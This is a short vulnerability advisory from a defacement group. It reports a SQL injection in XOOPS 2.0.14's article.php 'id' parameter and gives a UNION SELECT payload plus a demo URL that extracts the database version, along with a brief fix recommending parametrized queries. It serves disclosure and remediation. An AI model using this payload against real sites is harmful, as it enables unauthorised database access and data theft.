Text :  

###
# [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability #
# [#] Discovered By []0iZy5 #
# [#] http://r00tDefaced.com & uNkn0wn.eu(is back) #
# [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members#
###
#
# [2]-SQL injection
#
# Vulnerability Description:
# SQL injection is a code injection technique that exploits a
security vulnerability occurring in the database layer of an #application.
The vulnerability is present when user input is either incorrectly filtered
for string literal escape characters embedded in SQL #statements or user
input is not strongly typed and thereby unexpectedly executed.
#
# Affected items:
# http://127.0.0.1/path/modules/articles/article.php?id=[SQL
Injection]
#
# Example:
-1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
[You can find the number of vulnerable query]
# Demo:
http://www.site.com/modules/articles/article.php?id=1%20union%20all%20selec
t%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
#
# The Risk:
# By exploiting this vulnerability, an attacker can inject malicious
code in the script and can have access to the database.
#
# Fix the vulnerability:
# To protect against SQL injection, user input must not directly be
embedded in SQL statements. Instead, parametrized statements must be used
#(preferred), or user input must be carefully escaped or filtered.
#
####

# r00tDefaced.com [28/08/2010]

  References :  

None